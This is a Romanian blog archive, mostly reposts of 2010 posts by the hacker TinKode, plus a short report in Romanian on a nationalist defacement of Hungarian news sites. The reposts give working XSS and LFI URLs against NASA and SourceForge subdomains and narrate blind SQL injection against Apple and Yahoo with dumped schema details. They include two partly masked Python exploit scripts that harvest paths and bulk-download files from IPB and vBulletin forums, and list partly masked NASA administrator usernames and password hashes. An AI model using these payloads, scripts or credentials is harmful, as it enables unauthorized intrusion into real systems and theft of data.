Showing posts with label TinKode. Show all posts
Showing posts with label TinKode. Show all posts

Tuesday, February 7, 2012

Romanian National Security (RNS) pune Ungaria la pamant – Avram Iancu este motivul!


La aproape un an de la ultimile lovituri date de organizaÅ£ia Romanian National Security (RNS), gruparea a ieÅŸit la iveală, de nicăieri. Pentru cei care au pierdut evenimentele de anul trecut, RNS este o organizaÅ£ie de hackeri români ce au luat în mâini legea ÅŸi “pedepsesc” statele străine, în special presa online ÅŸi televiziunea, accesând ÅŸi modificând paginile principale ale acestora în mod neautorizat. Anul trecut a fost un val de atacuri venit din partea grupării îndreptat către state precum UK, Italia, FranÅ£a ce au publicat în media articole ÅŸi înregistrări în care românii erau confundaÅ£i cu Å£iganii într-un mod josnic.
După acele raiduri, gruparea a intrat în anonimat şi nici până astăzi nu sunt cunoscute informaţii concrete despre băieţii care organizează aceste raiduri. Unii susţin că grupul nu ar fi nici măcar român, deşi mesajele nu prea confirmă acest lucru.

De ce Ungaria?

În urmă cu câteva zile, extremiştii maghiari din Plutonul Secuiesc, organizaţie extremistă afiliată Gărzii Maghiare, au organizat, la Miercurea Ciuc, cu ocazia Zilei maghiarilor,o manifestatie publica in care l-au "spanzurat" pe Avram Iancu, liderul moţilor care au luptat în 1848-1949 cu trupele maghiare conduse de Kosuth Lajos.

Analiza atacului

Evenimentul a dat naÅŸtere unui val de proteste, care a atins ÅŸi gruparea RNS ce la doar 5 zile de la eveniment loveÅŸte puternic Ungaria. Mesajul publicat de aceÅŸtia fac referire directă la evenimentul de pe 15.03.2011. Atacul din această dimineaţă a afectat patru dintre cele mai importante surse de informaÅ£ie din Ungaria, printre care amintim tv2.hu (#1#2#3), budapesttimes.humagyarhirlap.hu (site-ul este indisponibil deja) ÅŸi echotv.hu. Toate aceste website-uri au avut afectate pagina principală sau o parte din subdomenii. Structura paginii este asemănătoare cu cea folosită în atacurile de anul trecut ce ne poate duce cu gândul la aceeaÅŸi grupare, dar acest lucru nu îl garantează nici ei, ÅŸi nici nimeni altcineva momentan. Motivul ce este invocat de mesajul deÅ£inut de site-urile presei ÅŸi televiziunii din Ungaria confirmă faptul că ei doar doresc să atragă atenÅ£ia asupra faptului că istoria României nu poate fi alterată ÅŸi umilită de o minoritate, cum sunt ungurii.
Rămâne de văzut cine va avea de suferit. :-)


Notă : Materialul prezentat reprezintă doar relatarea evenimentului,  jokeshahaa.blogspot.com nu a incurajat ÅŸi nu incurajează astfel de demersuri.

Sunday, February 5, 2012

TinKode-How to find XSS in NASA


How to find XSS in NASA

Posted by isrtinkode on February 16, 2010
__   __ _____ _____   _   _           _____
\ \ / // ____/ ____| | \ | |   /\    / ____|  /\
 \ V /| (___| (___   |  \| |  /  \  | (___   /  \
  > <  \___ \\___ \  | . ` | / /\ \  \___ \ / /\ \
 / . \ ____) |___) | | |\  |/ ____ \ ____) / ____ \
/_/ \_\_____/_____/  |_| \_/_/    \_\_____/_/    \_\
#How to find XSS in NASA?
Verry simple. What you have to do, is only to type on google, inurl:”tinkode”, and that it’s all.
Link google:
http://www.google.ro/search?hl=ro&client=firefox-a&rls=org.mozilla:en-US:official&hs=6Pn&q=*********&start=40&sa=N
Link Nasa XSS:
http://winds.jpl.nasa.gov/imagesAnim/images.cfm?pageName=ImagesAnim&subPageName=QuikSCAT&Image=QS_S1B28872%22%*********TinKode/%29%3C/script%3E
Yeah, this XSS is indexed on google, LOL.
Another XSS in NASA:
1. http://uavsar.jpl.nasa.gov/cgi-bin/data.pl?itext=1%22%3E%3*********/script%3E
2. http://hitf.jsc.nasa.gov/hitfpub/redirect.cfm?location=1%3C*********%29%3C/script%3E
3. http://sbir.gsfc.nasa.gov/sbirweb/search/searchResults.jsp?st=%*********/c0de.breaker/)%3C/script%3E
4. http://nmp.jpl.nasa.gov/ds2/search/search.pl?Range=All&Format=Standard&Terms=*********)%3C/script%3E
5. http://pims.grc.nasa.gov/calendars/qs_roadmap_index.php?year=*********)%3C/script%3E
6. http://starbeam.jpl.nasa.gov/tools/text-search/results.jsp?query=*********)%3C/script%3E
etc

TinKode-SourceForge LFI


SourceForge LFI

Posted by isrtinkode on February 18, 2010
 ____                            __
/ ___|  ___  _   _ _ __ ___ ___ / _| ___  _ __ __ _  ___
\___ \ / _ \| | | | '__/ __/ _ \ |_ / _ \| '__/ _` |/ _ \
 ___) | (_) | |_| | | | (_|  __/  _| (_) | | | (_| |  __/
|____/ \___/ \__,_|_|  \___\___|_|  \___/|_|  \__, |\___|
                                              |___/
Link: Sourceforge.net
Yeah, it’s vulnerable to LFI (Local File Inclusion).
http://in-dtsc.sourceforge.net/index.php?content=**********
http://in-dtsc.sourceforge.net/index.php?content=*******/conf/htt***.conf
For more informations read a tutorial about LFI.

TinKode-APPLE Vulnerable to Blind SQLi


APPLE Vulnerable to Blind SQLi

Posted by isrtinkode on February 18, 2010
          _____  _____  _      ______
    /\   |  __ \|  __ \| |    |  ____|
   /  \  | |__) | |__) | |    | |__
  / /\ \ |  ___/|  ___/| |    |  __|
 / ____ \| |    | |    | |____| |____
/_/    \_\_|    |_|    |______|______|
  #BlindSQLi by TinKode
@Apple
Apple is an American multinational corporation that designs and manufactures consumer electronics and computer software products.
The company’s best-known hardware products include Macintosh computers, the iPod, and the iPhone.
Apple software includes the Mac OS X operating system, the iTunes media browser, the iLife suite of multimedia and creativity software, the iWork suite of productivity software, Final Cut Studio, a suite of professional audio and film-industry software products, and Logic Studio, a suite of audio tools.
The company operates more than 250 retail stores in nine countries, and an online store where hardware and software products are sold.
Yeah, so it’s a huge company, but have a low security. Sad.
This parameter can be found by anyone in only 5 min with google.
Testing:


Now let’s see the version
#Version: 5
#Databases: locator_asiatest
#Tables from “locator_asia” database
[0]: reseller_city_utf8
[1]: reseller_district_utf8
[2]: reseller_provice_utf8
[3]: resellers_cn_utf8
[4]: resellers_company_utf8
[5]: resellers_emaillog
[6]: resellers_hk
[7]: resellers_hk_area
[8]: resellers_hk_district
[9]: resellers_id
[10]: resellers_id_area
[11]: resellers_id_district
[12]: resellers_kr
[13]: resellers_kr_area
[14]: resellers_kr_district
[15]: resellers_mo
[16]: resellers_mo_area
[17]: resellers_mo_district
[18]: resellers_my
[19]: resellers_my_area
[20]: resellers_my_district
[21]: resellers_ph
[22]: resellers_ph_area
[23]: resellers_ph_district
[24]: resellers_sg
[25]: resellers_sg_area
[26]: resellers_sg_company
[27]: resellers_th
[28]: resellers_th_area
[29]: resellers_th_district
[30]: resellers_tw
[31]: resellers_tw_area
[32]: resellers_tw_district
[33]: resellers_type
[34]: resellers_vn
[35]: resellers_vn_area
[36]: resellers_vn_district
[37]: sms_black_list
[38]: sms_log
[39]: sms_user_action_log
#Tables from “test” database
[0]: StoreRedir
[1]: downloadqueue
[2]: iwork
[3]: qtcomp
Columns from “reseller_city_utf8” table
[0]: id
[1]: provice_id
[2]: city
[3]: city_spell
[4]: municipality_flag
[5]: near1
[6]: near2
[7]: near3
[8]: near4
A good thing is that there is nothing important to extract…
Great, good bye, TinKode

TinKode-Yahoo Blind SQL Injection


Yahoo Blind SQL Injection

Posted by isrtinkode on February 18, 2010
__     __   _                   ____  _ _           _    _____  ____  _      _
\ \   / /  | |                 |  _ \| (_)         | |  / ____|/ __ \| |    (_)
 \ \_/ /_ _| |__   ___   ___   | |_) | |_ _ __   __| | | (___ | |  | | |     _
  \   / _` | '_ \ / _ \ / _ \  |  _ <| | | '_ \ / _` |  \___ \| |  | | |    | |
   | | (_| | | | | (_) | (_) | | |_) | | | | | | (_| |  ____) | |__| | |____| |
   |_|\__,_|_| |_|\___/ \___/  |____/|_|_|_| |_|\__,_| |_____/ \___\_\______|_|

                                            #By c0de.breaker@Romania
Yahoo! Inc. is an American public corporation headquartered in Sunnyvale, California, (in Silicon Valley), that provides Internet services worldwide. The company is perhaps best known for its web portal, search engine (Yahoo! Search), Yahoo! Directory, Yahoo! Mail, Yahoo! News, advertising, online mapping (Yahoo! Maps), video sharing (Yahoo! Video), and social media websites and services.
According to Web traffic analysis companies (including Compete.com, comScore, Alexa Internet, Netcraft, and Nielsen Ratings), the domain yahoo.com attracted at least 1.575 billion visitors annually by 2008. The global network of Yahoo! websites receives 3.4 billion page views per day on average as of October 2007. It is the second most visited website in the world in May 2009.
Vulnerable website: http://hk.adspecs.yahoo.com
Testing…


In this picture we can see as SELECT work
Now we try to find the version:
#Version: 5.0.11.24
Ok, it’s normal until now, but we can have access to mysql.user (bad)
And some tables from mysql.user (default)
MySQL Database, Table: user
#user
#password
~TinKode

TinKode-IPB Full Disclosure Exploit [Python]


IPB Full Disclosure Exploit [Python]

Posted by isrtinkode on February 19, 2010
#! /usr/bin/env python3.1

################################################################
#           _____ _____  ____  (validator.php)            #
#         |_   _|  __ \|  _ \                            #
#    | | | |__) | |_) |                           #
#     | | |  ___/|  _ <                            #
#     _| |_| |    | |_) |                           #
#     |_____|_|    |____/                            #
#                                   @expl0it...                #
################################################################
#          [ IPB Files / Directories Full Disclosure ]         #
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   #
#           [ Greetz: insecurity.ro, darkc0de.com ]            #
################################################################
#                                                              #
#                 Special thanks for: cmiN                     #
#                 www.TinKode.BayWords.com                     #
################################################################
#! /usr/bin/env python3.1 
 
################################################################ 
#           _____ _____  ____  (validator.php)            # 
#         |_   _|  __ \|  _ \                            # 
#    | | | |__) | |_) |                           # 
#     | | |  ___/|  _ <                            # 
#     _| |_| |    | |_) |                           # 
#     |_____|_|    |____/                            # 
#                                   @expl0it...                # 
################################################################ 
#          [ IPB Files / Directories Full Disclosure ]         # 
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   # 
#           [ Greetz: insecurity.ro, darkc0de.com ]            # 
################################################################ 
#                                                              # 
#                 Special thanks for: cmiN                     # 
#                 www.TinKode.BayWords.com                     # 
################################################################ 
 
 
import os, sys, urllib.request, urllib.parse, threading 
 
 
def main(): 
    logo = """ 
\t |---------------------------------------------------------------| 
\t |                      _____ _____  ____    (TM)                | 
\t |                     |_   _|  __ \|  _ \                       | 
\t |                       | | | |__) | |_) |                      | 
\t |                       | | |  ___/|  _ <                       | 
\t |                      _| |_| |    | |_) |                      | 
\t |                     |_____|_|    |____/                       | 
\t |                                                               | 
\t |                                                               | 
\t |                  IPB Full Disclosure expl0it                  | 
\t |                      Written by cmiN                          | 
\t |              Vulnerability discovered by TinKode              | 
\t |                                                               | 
\t |                                                               | 
\t |         Visit: www.insecurity.ro & www.darkc0de.com           | 
\t |---------------------------------------------------------------| 
""" 
    usage = """ 
         |---------------------------------------------------------------| 
         |Usage:  ipbfd.py scan http://www.site.com/IPB_folder           | 
         |        ipbfd.py download *.zip -> all                         | 
         |        ipbfd.py download name.jpg -> one                      | 
         |---------------------------------------------------------------|""" 
    if sys.platform in ("linux", "linux2"): 
        clearing = "clear" 
    else: 
        clearing = "cls" 
    os.system(clearing) 
    print(logo) 
    args = sys.argv 
    if len(********) == 3: 
        try: 
            print("Please wait...") 
            if args[1] == "********": 
                extract_parse_save(********)) 
            elif args[1] == "********": 
                download_data(********]) 
        except Exception as message: 
            print("An error occurred: ********)) 
        except: 
            print("Unknown error.") 
        else: 
            print(********") 
    else: 
        print(usage) 
    input() 
 
 
def extract_parse_save(url): 
    print("[+]Extracting content...") 
    hurl = url + "/validator.php" 
    with ********.********) as usock: 
        source = usock.read().decode() 
    print("[+]Finding token...") 
    word = "validate('" 
    index = source.find(word) 
    if index != -1: 
        source = source[********):] 
        value = source[:source.index(********)] 
        hurl = url ********.format(********) 
    else: 
        print("[!]Token not found.") 
    print("[+]********...") 
    with urllib.request.******** as usock: 
        lastk, lastv = None, None 
        dictionary = dict() 
        for line in usock: 
            line = line.decode() 
            index = line.find(********) 
            if index != -1: 
                lastk = line[index + ********" ").strip(********) 
            index = line.find(********") 
            if index != -1: 
                lastv = line[index + ********:line.index("********")].********(" ") 
            if lastk != None and lastv != None: 
                index = ********") 
                if index in (********, 0): 
                    lastk = "[other] {}".format(lastk) 
                else: 
                    lastk = "[********}".format(********) 
                dictionary[********astv 
                ******** = None, None 
    print("[+]Organizing and saving paths...") 
    with open("********", "********") as fout: 
        fout.write(********) 
        keys = sorted(********) 
        for key in keys: 
            fout.write(********)) 
 
 
def download_data(files): 
    print("[+]Searching ********...") 
    mthreads = ******** 
    with open(********) as fin: 
        url = fin.readline()********) 
        if files.find("*") == -1: 
            hurl = ********) 
            Download(hurl).start() 
        else: 
            ext = files[files.********] 
            for line in fin: 
                pieces = l********) 
                if pieces[0].count(ext) == 1: 
                    upath = pieces[1] 
                    hurl = ********) 
                    while threading.active********reads: 
                        pass 
                    Download(********) 
    while threading.active_count(******** 
        pass 
 
 
class Download(********): 
 
    def __********): 
        threading.Thread.********) 
        ******** = url 
 
    def run(self): 
        try: 
            with urllib.request.urlopen(********usock: 
                data = ********) 
                uparser = urllib.parse.urlparse(********) 
                pieces = uparser.********) 
                ******** = pieces[********] 
                with open(********) as fout: 
                    fout.********) 
        except: 
            pass 
 
 
********__main__": 
    main()


You must have python 3.1 to work!

TinKode-vBulletin Full Disclosure [Python]


vBulletin Full Disclosure [Python]

Posted by isrtinkode on February 19, 2010
#! /usr/bin/env python3.1
#
################################################################
#                ____        _ _      _   _ (validator.php)    #
#               |  _ \      | | |    | | (_)                   #
#         __   _| |_) |_   _| | | ___| |_ _ _ __               #
#         \ \ / /  _ <| | | | | |/ _ \ __| | '_ \              #
#          \ V /| |_) | |_| | | |  __/ |_| | | | |             #
#           \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|             #
#                                   @expl0it...                #
################################################################
#       [ vBulletin Files / Directories Full Disclosure ]      #
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   #
#           [ Greetz: insecurity.ro, darkc0de.com ]            #
################################################################
#                                                              #
#                  Special thanks for: cmiN                    #
#                  www.TinKode.BayWords.com                    #
################################################################
#! /usr/bin/env python3.1 
# 
################################################################ 
#                ____        _ _      _   _ (validator.php)    # 
#               |  _ \      | | |    | | (_)                   # 
#         __   _| |_) |_   _| | | ___| |_ _ _ __               # 
#         \ \ / /  _ <| | | | | |/ _ \ __| | '_ \              # 
#          \ V /| |_) | |_| | | |  __/ |_| | | | |             # 
#           \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|             # 
#                                   @expl0it...                # 
################################################################ 
#       [ vBulletin Files / Directories Full Disclosure ]      # 
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   # 
#           [ Greetz: insecurity.ro, darkc0de.com ]            # 
################################################################ 
#                                                              # 
#                  Special thanks for: cmiN                    # 
#                  www.TinKode.BayWords.com                    # 
################################################################ 
 
 
import os, sys, urllib.request, urllib.parse, threading 
 
 
def main(): 
    logo = """ 
\t |---------------------------------------------------------------| 
\t |                 ____        _ _      _   _     (TM)           | 
\t |                |  _ \      | | |    | | (_)                   | 
\t |          __   _| |_) |_   _| | | ___| |_ _ _ __               | 
\t |          \ \ / /  _ <| | | | | |/ _ \ __| | '_ \              | 
\t |           \ V /| |_) | |_| | | |  __/ |_| | | | |             | 
\t |            \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|             | 
\t |                                                               | 
\t |               vBulletin Full Disclosure expl0it               | 
\t |                      Written by cmiN                          | 
\t |              Vulnerability discovered by TinKode              | 
\t |                                                               | 
\t |              Dork: intext:"Powered by vBulletin"              | 
\t |          Visit: www.insecurity.ro & www.darkc0de.com          | 
\t |---------------------------------------------------------------| 
""" 
    usage = """ 
         |---------------------------------------------------------------| 
         |Usage:  vbfd.py scan http://www.site.com/vB_folder             | 
         |        vbfd.py download *.sql -> all                          | 
         |        vbfd.py download name.jpg -> one                       | 
         |---------------------------------------------------------------|""" 
    if sys.platform in ("linux", "linux2"): 
        clearing = "clear" 
    else: 
        clearing = "cls" 
    os.system(clearing) 
    print(logo) 
    args = sys.argv 
    if len(args) == 3: 
        try: 
            print("Please wait...") 
            if args[1] == "scan": 
                extract_parse_save(********)) 
            elif args[1] == "********": 
                download_data(********) 
        except Exception as message: 
            print("An error occurred: {}".********) 
        except: 
            print("Unknown error.") 
        else: 
            print(********) 
    else: 
        print(usage) 
    input() 
 
 
def extract_parse_save(url): 
    print("[+]********...") 
    hurl = url + "/validator.php" 
    with urllib.request.******** as usock: 
        source = ********() 
    print("[+]Finding ********") 
    word = "validate('" 
    source = source[source******** + len(word):] 
    value = ********] 
    print("[+]Obtaining paths...") 
    hurl = url + "/validator********(value) 
    with urllib.request.urlopen(hurl) as usock: 
        lastk, lastv = None, None 
        dictionary = dict() 
        for line in usock: 
            line = ********() 
            index = ********") 
            if index != -1: 
                lastk = line[index ********(" ") 
            index = line.find("********") 
            if index != -1: 
                lastv = line********) 
            if lastk != None and lastv != None: 
                index = ********) 
                if index in (-1, 0): 
                    lastk = "********) 
                else: 
                    lastk = "[{}] {}".format(********) 
                dictionary[lastk] = lastv 
                lastk, lastv = None, None 
    print("[+]Organizing and saving paths...") 
    with open(********) as fout: 
        fout.********) 
        keys = sorted(dictionary.keys()) 
        for key in keys: 
            fout.write********(key, dictionary[key])) 
 
 
def download_data(files): 
    print("[+]Searching and downloading files...") 
    ******** = 50 
    with open("********) as fin: 
        url = fin.readline(********) 
        if files.find********
            hurl = url + ********) 
            Download(hurl).start() 
        else: 
            ext = files[files.********] 
            for line in fin: 
                pieces = line********) 
                if pieces[0].******** 
                    upath = pieces[1] 
                    hurl = ********) 
                    while threading.active_********) > ******** 
                        pass 
                    Download(********).start() 
    while threading.********) > 1: 
        pass 
 
 
class Download(********): 
 
    def __init__(self, url): 
        threading.Thread.__********) 
        self.url = ******** 
 
    def run(********): 
        try: 
            with urllib.request.urlopen(self.url) as usock: 
                data = ********() 
                uparser = urllib.parse.urlparse(********) 
                pieces = ********.********) 
                fname = pieces[********] 
                with open(********) as fout: 
                    ********.write(data) 
        except: 
            pass 
 
 
********"__main__": 
    main()


You need python 3.1 to work!

TinKode-NASA 2 Websites Full Access


NASA 2 Websites Full Access

Posted by isrtinkode on February 19, 2010
 _   _
| \ | | __ _ ___  __ _
|  \| |/ _` / __|/ _` |
| |\  | (_| \__ \ (_| |
|_| \_|\__,_|___/\__,_|
      #owned by c0de.breaker
I had access to:
www.istd.gsfc.nasa.gov
www.sed.gsfc.nasa.gov
Some screens:
http://i44.tinypic.com/vnjl10.png
http://i41.tinypic.com/25j9zle.png
http://i37.tinypic.com/294t26t.png
http://i35.tinypic.com/qnpf9y.png
http://i38.tinypic.com/23r5mw.png
http://i37.tinypic.com/2rfe92u.png
http://i35.tinypic.com/a57s5e.png
Informations:
#Version: 5.0.41-community-nt-log
#User: **********.gsfc.nasa.gov
#Principal Database: *****
Tables from “*****” database:
#access
#branch
#docs
#docsbranch
#intro
#programs
Columns from “access” table:
#Id
#firstName
#lastName
#userName
#userID
#passWd
#projAdmin
#branchAdmin
#userAdmin
#userEmail
#deleteFlag
#dateCreated
#dateExp
Admins Accounts:
http://www.istd.gsfc.nasa.gov
[1]c****n:****2b550647
[2]c****n:****457ee5exxx = pass
[3]c****n:****14414xxx
[4]am****s:****df47xxx
[5]m****a:****b668859ca = demo
[6]pm****es:****b668859ca = demo
[7]hb****h:****b410747xxx
[8]rb****rut:****b410747xxx
[9]bw****r:****f299589xxx
[10]j****on:****dc4acc0xxx
[11]j****s:****c4acc0xxx
[12]l****ia:****4746f1dxxx
[13]g****w:****33e5ba3axxx
[14]j****le:****ff639f44xxx
[15]d****k:****0cf29958xxx
[16]A****s:****42fa7cxxx
http://www.sed.gsfc.nasa.gov
[17]l****y:****c17889xxx
[18]k****m:****9040104xxx
[19]j****ch:****dc4acc0xxx
[20]c****rmann:****027e9a6xxx
[21]rw****ey:****d42fa7cxxx
[22]y****e:****6107b5cxxx
[23]s****n:****cf29958xxx
[24]b****i:****dd3b569xxx
[25]lr****y:****410747xxx
[26]e****l:****bf05750xxx
[27]cd****ka:****bb79660xxx
[29]j****es:****e4746f1xxx
[30]r****z:****d75fb3exxx
[31]t****ley:****90f14657de5 = d41d8cd9
[32]e****ks:****d75fb3exxx
[33]ph****es:****6e3e050xxx
[34]pp****an:****0877c779xxx
[35]ac****n:****5eb1a0fexxx
I didn’t want to damage anything. Only to show that nasa subdomains have many SQLI, XSS, vulnerabilities etc
#Finish, c0de.breaker

TinKode-NASA Full-Disclosure! AGAIN


NASA Full-Disclosure! AGAIN

Posted by isrtinkode on February 19, 2010
 _   _                      _               _
| \ | | __ _ ___  __ _     / \   __ _  __ _(_)_ __
|  \| |/ _` / __|/ _` |   / _ \ / _` |/ _` | | '_ \
| |\  | (_| \__ \ (_| |  / ___ \ (_| | (_| | | | | |
|_| \_|\__,_|___/\__,_| /_/   \_\__, |\__,_|_|_| |_|
                                |___/
              #Full Disclosure... c0de.breaker
#Important
Ok. First of all, the reason I made this SQLi public ( even though I had no intention to make this ) , is because I found out that somebody else discovered the vulnerable parameter.I found this SQLi 3 months ago.
# Why do I test websites?
Because it is my hobby , and I want to prove that even the big websites, which should be highly secured, can be hacked. This is the reality , and it makes me sad.I feeling alright about what I’m doing, because if anyone finds a vulnerability before me , he/she could use it in harmful ways such as: shelling , rooting , backdooring , deleting etc
The WebSite Vulnerable: http://saif-1.larc.nasa.gov (CEOS Systems Analysis Database)
Testing:


Informations:
#Version: 5.1.31-community
#User: *******
#Main Database: *******
#Path of MySQL: C:\Documents and Settings\All Users\Application Data\MySQL\MySQL Server 5.1\Data\
Also, the magic_quotes_gpc=OFF, and “user” from mysql have all privileges:
Bad…
Other Databases:
#ceossadb
#information_schema
#mysql
#ceosvis
Tables from “ceosvis” database:
#instrument
#takes
#measurement
#contains
#mission
Tables from main Database:
#agency
#alt_names
#cat_measurements
#cat_missions
#cat_series
#cat_wavebands
#ceosdbversion
#constellations
#data_access_links
#db_update_phases
#ecv
#instr
#instr_agencies
#instr_desc
#instr_geometry
#instr_maturity
#instr_mission
#instr_res_swath_temp
#instr_sampling
#instr_status
#instr_status_biz
#instr_technology
#instr_technology_rawdata
#instr_type
#instr_waveband
#mappedor1
#measurement_confidence
#measurement_desc
#measurement_type
#measurementtypesconfidencepilot
#measurementtypespending
#method
#mission_agencies
#mission_status
#missions
#obs_requirments
#orbit_sense
#orbit_type
#requirements
#series
#series_agency
#series_missions
#societal_benefits
#sys_diagrams
#taxonomy
#typeatmosphere
#typereqapplication
#typerequirementsource
#typesmeasurementsconfidencepilot
#wmo_measurement
I made this public, because I saw the website down, and I think the administrators will fix the vulnerability once someone reports the problem. (sorry because i didn’t make this first, if was that)